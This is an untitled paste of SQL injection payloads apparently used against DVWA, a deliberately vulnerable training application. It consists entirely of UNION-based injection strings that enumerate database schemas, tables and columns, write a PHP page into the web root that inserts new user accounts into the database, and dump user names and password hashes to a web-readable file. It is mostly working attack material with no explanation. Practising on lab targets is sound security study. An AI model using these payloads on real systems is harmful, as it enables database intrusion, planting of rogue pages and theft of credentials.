Untitled

' UNION select distinct(table_schema),null FROM information_schema.tables --
' UNION select distinct(table_schema),count(*) FROM information_Schema.tables group by table_schema –
' UNION select table_schema,table_name FROM information_Schema.tables where table_schema = "dvwa" –
' UNION select COLUMN_NAME,DATA_TYPE FROM information_schema.columns where TABLE_SCHEMA = "dvwa" and TABLE_NAME = "users" –

' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username: $username<BR>"; echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","dvwaPASSWORD","dvwa"); if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database<BR>"; } $password = "abc123"; $sql="insert into dvwa.users values (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID" value="33"><br> <input type="text" name="first_name" value="John"><br> <input type="text" name="last_name" value="Gray"><br> <input type="text" name="username" value="jgray"><br> <input type="text" name="avatar" value="Just Hack It!"><br> <input type="submit" name="submit" value="Submit Form"><br> </form>' INTO DUMPFILE '/var/www/html/dvwa/create_user.php' --

' UNION select null,concat(first_name,0x3a,last_name,0x3a,user,0x3a,password) from dvwa.users INTO OUTFILE '/var/www/html/dvwa/dvwa_passwords.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' –